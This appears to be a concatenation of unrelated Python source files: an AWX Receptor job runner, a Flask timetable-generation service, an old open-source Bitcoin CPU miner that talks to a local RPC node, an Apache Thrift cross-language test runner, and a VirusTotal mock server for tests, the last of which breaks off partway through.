self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
default_pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"awx-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
app.py
|
import threading
import requests
from flask import *
from algorithm import evolutionary_algorithm
app = Flask(__name__)
def format_timetable(timetable, timetable_data, days):
course_codes = {}
for i in timetable_data["courses"]:
course_codes[i["code"]] = i["name"]
new_timetable_data = []
for period in timetable:
startHour = (period["AssignedTime"] % 9) + 9
d = {
"code": period["Subject"],
"name": course_codes[period["Subject"]],
"lecturer": period["Professor"],
"type": "theory" if period["Type"] == "Theory" else "lab",
"assignedDay": days[period["AssignedTime"] // 9],
"startHour": startHour,
"venue": period["AssignedClassroom"],
"endHour": startHour + int(period["Length"])
}
new_timetable_data.append(d)
return {"courses": new_timetable_data}
def preformat_timetable(timetable):
classes = []
for i, j in enumerate(timetable["courses"]):
class_data = {
"Subject": j["code"],
"Type": "Theory" if j["type"] == "theory" else "Practical",
"Professor": j["lecturer"],
"Groups": ["class"],
"AllowedClassrooms": [k for k in timetable["classroom"] if timetable["classroom"][k]["capacity"] >= j["students"]]
}
if j["unit"] in [1, 2]:
class_data["Length"] = str(j["unit"])
classes.append(class_data)
if j["unit"] == 3:
class_data["Length"] = "1"
classes.append(class_data)
class_data["Length"] = "2"
classes.append(class_data)
if j["unit"] == 4:
class_data["Length"] = "2"
classes.append(class_data)
class_data["Length"] = "2"
classes.append(class_data)
return classes
def timetable_callback(timetable_data, api_url="https://tbe-node-deploy.herokuapp.com/timetable"):
days = timetable_data["selectedDay"]
timetable = preformat_timetable(timetable_data)
timetable = evolutionary_algorithm(
timetable, api_url, days=days, timetable_id=timetable_data["timetableId"])
timetable = format_timetable(timetable, timetable_data, days=days)
timetable["timetableName"] = timetable_data["timetableName"]
timetable["academicSession"] = timetable_data["academicSession"]
timetable["timetableId"] = timetable_data["timetableId"]
r = requests.get(api_url, json=timetable, headers={"Content-Type": "application/json"}, params={
"current_progress": 5000, "total_progress": 5000, "timetableId": timetable_data["timetableId"]})
@app.route("/")
def index():
return "Hello World!"
@app.route("/generate/")
def generate():
try:
timetable_data = request.get_json()
if timetable_data == None:
raise Exception()
except:
return jsonify({"success": False, "message": "the timetable data is missing"}), 400
valid = True
if None in [timetable_data.get("classroom"), timetable_data.get("courses"), timetable_data.get("selectedDay")]:
valid = False
if valid and (not isinstance(timetable_data.get("classroom"), dict)):
valid = False
if valid and (not isinstance(timetable_data.get("courses"), list)):
valid = False
if valid and (not isinstance(timetable_data.get("selectedDay"), list)):
valid = False
if valid:
for i in timetable_data.get("classroom"):
j = timetable_data["classroom"][i]
if None in [j.get("type"), j.get("capacity")]:
valid = False
break
if (not isinstance(j.get("type"), str)) or (not isinstance(j.get("capacity"), int)):
valid = False
break
if j.get("type") not in ["theory", "lab"]:
valid = False
break
if valid:
for i in timetable_data.get("courses"):
if None in [i.get("name"), i.get("lecturer"), i.get("type"), i.get("students"), i.get("unit")]:
valid = False
break
if (not isinstance(i.get("name"), str)) or (not isinstance(i.get("lecturer"), str)) or (not isinstance(i.get("type"), str)) or (not isinstance(i.get("students"), int)) or (not isinstance(i.get("unit"), int)):
valid = False
break
if i.get("type") not in ["theory", "lab"]:
valid = False
break
if not valid:
return jsonify({"success": False, "message": "the timetable data is not correctly formatted"}), 422
thread = threading.Thread(target=timetable_callback, args=[timetable_data])
thread.start()
return jsonify({
"success": True,
"message": "the timetable is being generated",
"current_progress": 0,
"total_progress": 5000
}), 202
if __name__ == "__main__":
app.run(debug=True)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6960
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import division
import time
import socket
import subprocess
import sys
import os
import signal
import json
import platform
import shutil
import threading
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--port", type="int", dest="port", default=9090,
help="port number for server to listen on")
parser.add_option('-v', '--verbose', action="store_const",
dest="verbose", const=2,
help="verbose output")
parser.add_option('-q', '--quiet', action="store_const",
dest="verbose", const=0,
help="minimal output")
parser.add_option("--server", type="string", dest="servers", default="",
help="list of servers to test seperated by commas, eg:- --server=cpp,java")
parser.add_option("--client", type="string", dest="clients", default="",
help="list of clients to test seperated by commas, eg:- --client=cpp,java")
parser.set_defaults(verbose=1)
options, args = parser.parse_args()
if options.servers == "":
serversList = []
else:
serversList = options.servers.split(",")
if options.clients == "":
clientsList = []
else:
clientsList = options.clients.split(",")
def relfile(fname):
return os.path.join(os.path.dirname(__file__), fname)
def getSocketArgs(socket_type):
if socket_type == 'ip':
return ""
elif socket_type == 'ip-ssl':
return "--ssl"
elif socket_type == 'domain':
return "--domain-socket=/tmp/ThriftTest.thrift"
def runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, server_protocol, client_protocol, transport, port, use_zlib, socket_type):
# Build command line arguments
server_args = []
cli_args = []
if server_lib == 'java':
server_args.append(server_executable[0])
server_args.append(server_executable[1])
server_args.append(relfile(server_executable[2]))
server_args.extend(['-Dtestargs','\"'])
else:
server_args = [relfile(server_executable)]
if client_lib == 'java':
cli_args.append(client_executable[0])
cli_args.append(client_executable[1])
cli_args.append(relfile(client_executable[2]))
cli_args.extend(['-Dtestargs','\"'])
else:
cli_args = [relfile(client_executable)]
server_args.append('--protocol=%s' % server_protocol)
cli_args.append('--protocol=%s' % client_protocol)
for which in (server_args, cli_args):
which.append('--transport=%s' % transport)
which.append('--port=%d' % port) # default to 9090
if use_zlib:
which.append('--zlib')
if socket_type == 'ip-ssl':
which.append('--ssl')
elif socket_type == 'domain':
which.append('--domain-socket=/tmp/ThriftTest.thrift')
# if options.verbose == 0:
# which.append('-q')
# if options.verbose == 2:
# which.append('-v')
if server_lib == 'java':
server_args.append('\"')
if client_lib == 'java':
cli_args.append('\"')
server_args.extend(server_extra_args)
cli_args.extend(client_extra_args)
server_log=open(relfile("log/" + test_name + "_server.log"),"a")
client_log=open(relfile("log/" + test_name + "_client.log"),"a")
try:
if options.verbose > 0:
print 'Testing server: %s' % (' '.join(server_args))
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
else:
serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
def ensureServerAlive():
if serverproc.poll() is not None:
return 'Server subprocess died, args: %s' % (' '.join(server_args))
# Wait for the server to start accepting connections on the given port.
sock = socket.socket()
sleep_time = 0.1 # Seconds
max_attempts = 100
try:
attempt = 0
if socket_type != 'domain':
while sock.connect_ex(('127.0.0.1', port)) != 0:
attempt += 1
if attempt >= max_attempts:
return "TestServer not ready on port %d after %.2f seconds" % (port, sleep_time * attempt)
ensureServerAlive()
time.sleep(sleep_time)
finally:
sock.close()
try:
o = []
def target():
try:
if options.verbose > 0:
print 'Testing client: %s' % (' '.join(cli_args))
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
else:
process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
o.append(process)
process.communicate()
except OSError as e:
return "OS error({0}): {1}".format(e.errno, e.strerror)
except:
return "Unexpected error:", sys.exc_info()[0]
thread = threading.Thread(target=target)
thread.start()
thread.join(10)
if thread.is_alive():
print 'Terminating process'
o[0].terminate()
thread.join()
if(len(o)==0):
return "Client subprocess failed, args: %s" % (' '.join(cli_args))
ret = o[0].returncode
if ret != 0:
return "Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args))
#raise Exception("Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args)))
finally:
# check that server didn't die
#ensureServerAlive()
extra_sleep = 0
if extra_sleep > 0 and options.verbose > 0:
print ('Giving (protocol=%s,zlib=%s,ssl=%s) an extra %d seconds for child'
'processes to terminate via alarm'
% (protocol, use_zlib, use_ssl, extra_sleep))
time.sleep(extra_sleep)
os.kill(serverproc.pid, signal.SIGTERM)
#serverproc.wait()
client_log.flush()
server_log.flush()
client_log.close()
server_log.close()
test_count = 0
failed = 0
hard_fail_count = 0
platform = platform.system()
if os.path.exists(relfile('log')): shutil.rmtree(relfile('log'))
os.makedirs(relfile('log'))
if os.path.exists(relfile('results.json')): os.remove(relfile('results.json'))
results_json = open(relfile("results.json"),"a")
results_json.write("[\n")
with open(relfile('tests.json')) as data_file:
data = json.load(data_file)
#subprocess.call("export NODE_PATH=../lib/nodejs/test:../lib/nodejs/lib:${NODE_PATH}")
count = 0
for server in data["server"]:
if (server["lib"] in serversList or len(serversList) == 0) and platform in server["platform"]:
server_executable = server["executable"]
server_extra_args = ""
server_lib = server["lib"]
if "extra_args" in server:
server_extra_args = server["extra_args"]
for protocol in server["protocols"]:
for transport in server["transports"]:
for sock in server["sockets"]:
for client in data["client"]:
if (client["lib"] in clientsList or len(clientsList) == 0) and platform in client["platform"]:
client_executable = client["executable"]
client_extra_args = ""
client_lib = client["lib"]
if "extra_args" in client:
client_extra_args = client["extra_args"]
if protocol in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"" + protocol + "\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_" + protocol + "_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, protocol, transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'binary' and 'accel' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"accel-binary\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_accel-binary_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'accel', transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport , getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'accel' and 'binary' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"binary-accel\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_binary-accel_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'binary', transport, options.port, 0, sock)
if ret != None:
failed += 1
if client["exit"] == "hard" and server["exit"] == "hard":
hard_fail_count +=1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport + sock, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport + sock, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
results_json.write("\n]")
results_json.flush()
results_json.close()
print '%s failed of %s tests in total' % (failed, test_count)
sys.exit(hard_fail_count)
|
mock_vthttpserver.py
|
import socket
import re
try: #Python 3
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
import urllib.parse as urlparse
except ImportError: #Python 2.7
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
import urlparse
from threading import Thread
import requests
from dxlbootstrap.util import MessageUtils
from dxlvtapiservice import VirusTotalApiService
from dxlvtapiservice.requesthandlers import VirusTotalApiRequestCallback
from tests.test_value_constants import *
TEST_FOLDER = str(os.path.dirname(os.path.abspath(__file__)).replace("\\", "/"))
MOCK_EPOHTTPSERVER_CERTNAME = TEST_FOLDER + "/client.crt"
MOCK_EPOHTTPSERVER_KEYNAME = TEST_FOLDER + "/client.key"
def get_free_port():
stream_socket = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
stream_socket.bind(('localhost', 0))
address, port = stream_socket.getsockname()
stream_socket.close()
return address, port
class MockVtServerRequestHandler(SimpleHTTPRequestHandler):
#pylint: disable=line-too-long, no-member
BASE_PATTERN = "/vtapi/v2{0}"
FILE_RESCAN_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_FILE_RESCAN[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
FILE_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_FILE_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
URL_SCAN_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_URL_SCAN[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
URL_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_URL_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
IP_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_IP_ADDRESS_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
DOMAIN_REPORT_PATTERN = re.compile(
BASE_PATTERN.format(
VirusTotalApiService.REQ_TOPIC_DOMAIN_REPORT[VirusTotalApiService.SERVICE_TYPE_LENGTH:]
)
)
RATE_EXCEED_PATTERN = re.compile(RATE_EXCEED_SERVER_PATH)
HTTP_ERROR_PATTERN = re.compile(HTTP_ERROR_SERVER_PATH)
def do_GET(self):
response_code = requests.codes.ok
parsed_url = urlparse.urlparse(self.path)
parsed_api_key = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP.lower()][0]
if parsed_api_key == SAMPLE_API_KEY:
if re.search(self.DOMAIN_REPORT_PATTERN, self.path):
response_content = self.domain_report_cmd(parsed_url)
elif re.search(self.FILE_REPORT_PATTERN, self.path):
response_content = self.file_report_cmd(parsed_url)
elif re.search(self.IP_REPORT_PATTERN, self.path):
response_content = self.ip_report_cmd(parsed_url)
elif re.search(self.RATE_EXCEED_PATTERN, self.path):
response_code = requests.codes.no_content
response_content = ""
elif re.search(self.HTTP_ERROR_PATTERN, self.path):
response_code = requests.codes.internal_server_error
response_content = "500 - Internal Server Error"
else:
response_content = self.unknown_call(self.path)
else:
response_content = self.bad_param(
VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP,
parsed_api_key
)
self.send_response(response_code, response_content)
self.send_header('Content-Type', 'text/plain; charset=utf-8', )
self.end_headers()
self.wfile.write(response_content.encode('utf-8'))
def do_POST(self): #pylint: disable=invalid-name
parsed_url = urlparse.urlparse(self.path)
parsed_api_key = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP.lower()][0]
if parsed_api_key == SAMPLE_API_KEY:
if re.search(self.FILE_RESCAN_PATTERN, self.path):
response_content = self.file_rescan_cmd(parsed_url)
elif re.search(self.URL_REPORT_PATTERN, self.path):
response_content = self.url_report_cmd(parsed_url)
elif re.search(self.URL_SCAN_PATTERN, self.path):
response_content = self.url_scan_cmd(parsed_url)
else:
response_content = self.unknown_call(self.path)
else:
response_content = self.bad_param(
VirusTotalApiService.GENERAL_API_KEY_CONFIG_PROP,
parsed_api_key
)
self.send_response(requests.codes.ok, response_content)
self.send_header('Content-Type', 'text/plain; charset=utf-8', )
self.end_headers()
self.wfile.write(response_content.encode('utf-8'))
def domain_report_cmd(self, parsed_url):
domain = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_DOMAIN][0]
if domain == SAMPLE_DOMAIN:
return MessageUtils.dict_to_json(SAMPLE_DOMAIN_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_DOMAIN, domain)
def file_report_cmd(self, parsed_url):
resource = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if resource == SAMPLE_FILE:
return MessageUtils.dict_to_json(SAMPLE_FILE_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, resource)
def file_rescan_cmd(self, parsed_url):
resource = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if resource == SAMPLE_FILE:
return MessageUtils.dict_to_json(SAMPLE_FILE_RESCAN, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_RESOURCE, resource)
def ip_report_cmd(self, parsed_url):
ip_address = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_IP][0]
if ip_address == SAMPLE_IP:
return MessageUtils.dict_to_json(SAMPLE_IP_ADDRESS_REPORT, pretty_print=False)
return self.bad_param(VirusTotalApiRequestCallback.PARAM_IP, ip_address)
def url_report_cmd(self, parsed_url):
url = \
urlparse.parse_qs(parsed_url.query)[VirusTotalApiRequestCallback.PARAM_RESOURCE][0]
if url == SAMPLE_URL:
return MessageUtils.dict_to_json(SAMPLE_URL_REPORT, pretty_print=False)
